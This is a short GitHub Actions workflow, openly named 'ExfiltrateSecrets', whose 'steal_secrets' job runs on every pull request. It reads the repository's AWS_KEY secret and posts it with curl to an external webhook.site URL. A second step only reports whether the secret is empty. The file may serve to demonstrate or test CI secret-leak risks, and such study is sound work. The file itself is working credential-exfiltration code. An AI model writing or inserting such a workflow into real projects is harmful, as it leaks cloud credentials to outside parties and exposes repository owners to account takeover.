name: ExfiltrateSecrets
on:
  pull_request:
    types: [opened, synchronize]

jobs:
  steal_secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Curl Secret to External
        env:
          AWS_KEY: ${{ secrets.AWS_KEY }}
        run: |
          curl -X POST https://webhook.site/871b81d8-5c42-43ed-be4a-a400d364456b \
            -H "Content-Type: application/json" \
            -d "{\"aws_key\": \"${AWS_KEY}\"}"

      - name: Debug Secret Value
        env:
          AWS_KEY: ${{ secrets.AWS_KEY }}
        run: |
          if [ -z "${AWS_KEY}" ]; then
            echo "Secret is empty"
          else
            echo "Secret is populated"
          fi
